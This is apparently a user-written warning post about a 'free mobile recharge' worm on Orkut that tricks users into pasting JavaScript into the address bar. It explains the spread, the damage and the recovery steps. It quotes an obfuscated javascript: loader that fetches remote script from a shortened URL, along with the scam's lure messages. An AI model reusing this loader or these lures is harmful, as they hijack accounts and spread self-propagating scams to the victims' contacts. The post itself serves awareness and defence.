It all starts with users receiving a link on Orkut that takes them to a website displaying a big banner that reads: "Recharge your mobile here!" According to information presented on this page, the user will receive a free recharge code in their Orkut scrapbook if they copy and paste some JavaScript code into the address bar.
Doing so will force the browser to access a Snurl.com shotened URL. "That triggers a big page of javascript code located at orkutaddict(dot)net/freerecharge/dpd(dot)js. At this point, the path branches off depending on whether you’re logged into Orkut or not,"
Attackers Use these types of scripts as:
javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//shlnk%22+%22.%22+%22com%22+%22/%22+%222d6%22;void(0)
In any some of these scripts removing "%22+%22" from script will give me the website name.
which you are requested to paste on url and then your account may be hacked.
Leading to flooding of ones account, within a minute Ur account is Temporarily Disabled to do various actions
Like one cannot scrap or Do message to anyone…. This may also lead to the Deletion of Ones Account.
I have found some of the links(like:http://jghjghjjg.blogspot.com/) and users who do that.If you got from than he/she may also be the victim because the script attacks on your account,profile,scrapbook,friend list,"about me"section etc.I have made web to be banned some of the links as if you try too open your browser will not allow to open ,it will shows :
"Reported Web Forgery!" On MOZILLA FIREFOX
"Warning! Suspected Phishing site!!" On GOOGLE CHROME.
This depends upon your web-browser.
I don't know what it shows on internet explorer.Find it,if it shows nothing related to warning that means it will show you fake orkut login page so,DON'T get logged in from it.
Attack Method:
by scrap as:
"
Oww YOu knw Abt new FREE RECHARGE TRICK
Just Go to thiz SITE its So Dashing Yaar
IT WORKS!!! FREE RECHARGE TRICK .
Just Go to thiz Site And Follow The Below Steps yaar:
Acesse: www.shlnk.com/2ll
Copy n Paste link where www , orkut, com / Main *#Home is written i.e orkut home page
.
Try yaar its So awsum N I got recharge N accept my testinomial Also
(Check My Profile For More Recharge Cards)No Of PEOPLE WHO WON:15830032
"
Or
[[..::FOLLOW STEPS 4 FREE!! CELLPHONE RECHARGE::..
1)- Copy the Below Code in RED and Paste in URL Bar Where u write _(www.orkut.com_) and Press Enter
Code:
javascript:d=document;c=d.
2)- Enter You Mobile Number and get Free Recharge..
Also Pass this to your Friends To GET MORE RECHARGE]]
----------------------------------------------------------------------------------------------------------------
▪ What we the users can do to stop this ?
→ Report the URLs at http://www.google.com/safebrowsing/report_phish/
→ Stop script (running javascripts in Orkut).
→ Tell freinds about these scams and to be safe.
→ Delete the auto-generated scam thread in the communities.
▪ What happens when the script runs ?
→ Edit your about me, status .
→ Send scraps to your friends to run the script.
→ Post threads on the communities you joined.
→ Comment on photos of your friends
→ Send testimonials etc.
▪ I have already script run,now what can I do?
→ Clear cookies and Cache
→ Change your account settings ie, password & security question.
→ Edit your about me, status etc which was changed by the script.
→ Never run any type of scripts again.
Always remember these points :
1.Don't ever log in to any site rather than www.orkut.com
2.Don't ever run any java scripts while logged into your orkut account
3.Never use any flooder in your account
4.Don't ever share your password with anyone else and keep changing your password regularly.
5.Don't ever click suspicious link while logged into Orkut a/c. if you are curious you can copy the link and check them in
other browser after cleaning it's browser's cookie and cache.
6.Don't ever install any suspicious script on greasemoneky and ALWAYS DISABLE THE GM before logging in to orkut.
7.Do your mobile verification also, so that you can get back your a/c if hacker doesn't change the mobile number there.
http://www.orkut.co.in/Main#
Also visit my post "GOOGLE PASSWORD RECOVERY(Coming Soon)"
8.Install a good Update Antivirus and Anti Key logger and keep your system free from Key loggers and backdoor trojans.
9.Use Virtual Keyboard to enter your password.
10.Also look carefully the link given in anyone's profile or community even if it is the orkut link like http://www.orkut.co.in/Main#Community?cmm=xxxxxx carefully mark if it is orkut instead of okrut.
I will post the script that is used to do these if you want.
visit:
http://learninformationsecurity.t35.com/orkut_script
You are welcome for further suggestions/queries.
YASH.
